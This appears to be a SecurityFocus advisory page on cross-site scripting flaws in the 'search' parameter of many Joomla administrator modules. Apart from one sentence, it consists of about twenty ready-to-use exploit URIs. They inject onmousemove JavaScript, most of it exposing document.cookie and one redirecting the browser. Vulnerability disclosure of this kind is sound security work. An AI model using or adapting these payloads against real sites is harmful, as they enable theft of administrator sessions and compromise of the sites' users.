Joomla! Multiple Modules 'search' Parameter Cross-Site Scripting Vulnerabilities

An attacker can exploit these issues by enticing an unsuspecting user to follow a malicious URI.

The following example URIs are available:

http://www.example.com/administrator/index.php?option=com_users&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_users&search=%22%20onmousemove=%22javascript:window.location.assign%28%27http://www.example.com%27%29%22%3E
http://www.example.com/administrator/index.php?option=com_trash&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_content&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_sections&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_categories&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_frontpage&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_menus&task=view&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_messages&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_banners&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_banners&c=client&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_categories&section=com_banner&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_contact&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_categories&section=com_contact_details&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_newsfeeds&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_categories&section=com_newsfeeds&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_poll&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_weblinks&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_categories&section=com_weblinks&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_modules&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_plugins&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E


 

Privacy Statement
Copyright 2010, SecurityFocus